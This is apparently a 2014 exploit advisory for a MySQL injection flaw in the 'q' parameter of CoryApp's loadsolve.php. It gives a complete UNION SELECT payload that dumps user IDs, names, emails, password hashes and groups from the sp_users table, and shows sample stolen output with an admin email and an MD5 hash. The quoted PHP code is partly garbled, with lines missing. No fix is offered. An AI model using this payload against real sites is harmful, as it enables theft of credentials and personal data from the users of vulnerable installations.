# Exploit Title: CoryApp (Cory Support) MySQL Injection Vulnerabilities # Google Dork: None # Date: 02,March 02,2014 # Exploit Author: Slotleet # Vendor Homepage: http://coryapp.com # Software Link: http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934 (u have to register) # Version: None # Tested on: Win,Linux # Greet'z : I-HMX <3 ========================== Vulnerability Description ========================== The Cory Support is prone to Get MySQL Injection Vulnerabilities ========================== PoC-Exploit ========================== // GET MySQL Injection with "q" Parameter in /loadsolve.php 1 : 0){ 7 : while($rows = mysql_fetch_array($qry)){ 8 : echo '

'.stripslashes($rows['Solutions']).'
'; 9 : } 10 : echo '

. . .

View more'; 11 : } 12 : else echo 'Not have answer !'; 13 : mysql_close(); 14 : ?> In line 3 coder failed to secure the "q" Parameter Against (MySQL Injection) using q parameter (1) Under "q" set your GET Parameter q to "999999.9' union all select (select concat(0x27%2C0x7e%2Cunhex(Hex(cast(sp_users.UserID as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Name as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Email as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Password as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.UserGroup as char)))%2C0x27%2C0x7e) from `DATABASE NAME HERE`.sp_users limit 5%2C1) %2C0x31303235343830303536 and 'x'%3D'x" (without quotation marks) The "q" GET MySQL injection will be executed for the MySQL Server From browser (You'll see the info like '~6^admin^slotleet@gmail.com^e10adc3949ba59abbe56e057f20f883e^3'~) ========================== Solution ========================== Not Available. ========================== Credits ========================== Vulnerabilities found and advisory written by Slotleet.